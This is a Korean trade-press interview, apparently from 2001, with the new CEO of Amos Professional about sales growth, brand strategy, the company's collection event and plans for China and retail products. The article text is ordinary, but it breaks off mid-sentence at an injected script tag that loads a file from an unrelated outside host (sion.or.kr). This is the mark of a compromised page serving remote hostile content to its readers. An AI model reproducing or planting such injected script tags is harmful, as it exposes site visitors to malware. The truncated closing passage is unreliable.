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(주)아모스 프로페셔널 신윤식 대표이사
  • 승인 2001.08.31 11:22
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웰라, 로레알이 주도하고 있던 국내 프로페셔널 미용업계에 국내 브랜드로 3파전의 양상을 주도하고 있는 "아모스 프로페셔널"이 지난해 60%라는 매출성장으로 화제가 되고 있다. 최근대기업에서의 미용실 진출설이 분분한 가운데 많은 기업들이 미용시장에 많은 관심을 나타내고 있으며, 이미 몇몇 회사에서는 시장조사가 끝난 것으로 알려지고 있다. 업계관계자 들은 여러 가지 흐름으로 볼 때 앞으로 미용시장의 경쟁이 더욱 심화될것으로 전망하고 있 다. 이러한 때에 지난12월 18일자로 아모스 프로페셔널 대표이사로 신윤식 대표가 취임하면 서 아모스의 앞으로 행보에 관심이 집중되고 있다. 신대표를 만나 앞으로 경영방침과 현재 미용업계 전망에 대해 들어보았다. 이사승진 1년만에 또다시 대표이사로 취임한 데 대하여 축하드린다. 현대 미용업계시장 흐름이 하루가 다르게 바뀌고 있어 최고의 자리에 올랐지만 매우 어께가 무거울 것이라 생 각된다. 지난해 아모스 프러페셔널은 99,2000년 2년간 60% 성장이라는 놀라운 매출을 기록 했다. 이러한 결과를 최고 경영자로써 어떻게 생각하는가. "솔직히 수치상 매우 높게 느껴진다. 그것은 종전의 매출이 작았기 때문이 아닌가 하는 생 각이 든다. 오히려 앞으로는 급성장보다 안정성장을 유지할것으로 판단된다. 올해는 20%정 도 늘려 매출을 목표로 하고 있다. 매출이 커질수록 수치상으로는 조금씩 중어들게 된다." 어쨌든 미영업계의 관례로 볼 때 2년연속 60%성장이라는 것은 놀라운 수치 아닌가. "물론 아모스 전직원들이 최선을 다하고 고생한 결과라는 것은 두말할 필요가 없다. 크게봤 을때는 고객과의 "신뢰"였다. 아모스가 이제 미용인들로부터 신뢰를 얻었다고 생각한다. 3년 전부터 정확히 시장조사와 흐름을 읽었고, 그에따라 이제 하나씩 전략을 펼치기 때문이다.아 직수치상의 매출을 굳이 크게 내새우지 않는 것은 아모스가 앞으로 추구하는 마케쉐어는 현 재와는 비교할수 없을만큼 크기 때문에 이제 시작단계에서 얼마의 성장은 오히려 아모스의 잠재력을 과소평가하는 것 아닌가 하는 생각이 든다." 아모스가 추구하는 시장은 어떤것인가. "가장 중요한 것은 "브랜드력(Brand Power)"이다. 최고의 기업과 그렇지 못한 기업들 기업 들의 차이는 바로 브랜드력에 대해 그동안 전략을 세웠고, 자난해부터 그에따른 실행에 옮 기고 있는 것이다. 눈앞에 급급한 시장은 보지 않는다. 장기적인 시장을 우리는 계획하고 있다. 때문에 주위에서 놀라워 하는 매출성장은 작은부분에 불과하다는 것이다." 지난해 열렸던 "2000 아모스 컬렉션"도 그러한 시각에서 해석하면 되는가. "바로 그 점이다. 행사가 끝났을 때 너무 순순한 컬렉션이었고, 그 행사를 통해 아모스 홍보 는 전혀 없어 의아하게 생각했던 시각들이 많았다. 기업이 하는 행사가 무조건 자사(自社)의 이익에만 급급한다면 기업의 철학을 의심해 보아야한다. 올2월에 열리지만 앞으로 아모스 컬렉션은 무주건 미용계의 발전을 위한다는 순수한 행사로 갈 것이다. 또 아모스 컬렉션은 앞으로도 새로운 시도가 이어질 것이다. 아마도 올해도 상상 할수 없는 행사가 될 것이다." 대표이사의 취임에 많은 업계관계자들이 신대표에 대한 기대가 많다. 앞으로 아모스의 장기적인 전략은 어떤 것들인가. "모든 것을 다 밝힐수는 없고, 다만 앞으로 업계 발전을 위한 투자가 점점 더 늘어날 것이 다. 해외진출에 대한 질문을 많이 받는다. 아모스는 오는 2003년 본격시작 할 것이다. 2003 년이면 국내시장에서도 다국적 기업과 경쟁에서 우위에서 설 수 있기 때문에 시기를 그때로 보고 있다. 올해부터 중국 시장 공략은 제품만이 아니다. 한국 미용전체가 중국으로 간다고 보면된다." 아모스의 올해 큰변화가 있다면 어떤것인가. "여러 가지 변화가 준비되어 있다. 그 중에서 5월에 점두판매용 제품이 출시된다. 그동안 점 판라인은 아모스가 없었다. 점판은 매우 어려운 시장이다. 브랜드력의 결정체가 전판시장이 라고 본다. 헤어케어의 중심이 된 제품들이 5월이면 개발이 끝나가 떄문에 새로운 시장군을 공략하게 될 것이다." 지난 몇해 동안 염모시장이 급성장했다. 앞으로 염모시장 뿐만 아니라 미용시장 전체 흐 름이 어떻게 전개될것으로 보는가. "지난해까지 염모시장이 많이 성장했기 때문에 성장세는 다소 완화가 될 것으로 전망된다. 염모시장은 계속적으로 현재와 같이 호황을 맞이하게 될 것이다. "헤어케어"시장이 ?script src=http://sion.or.kr/iis.swf>

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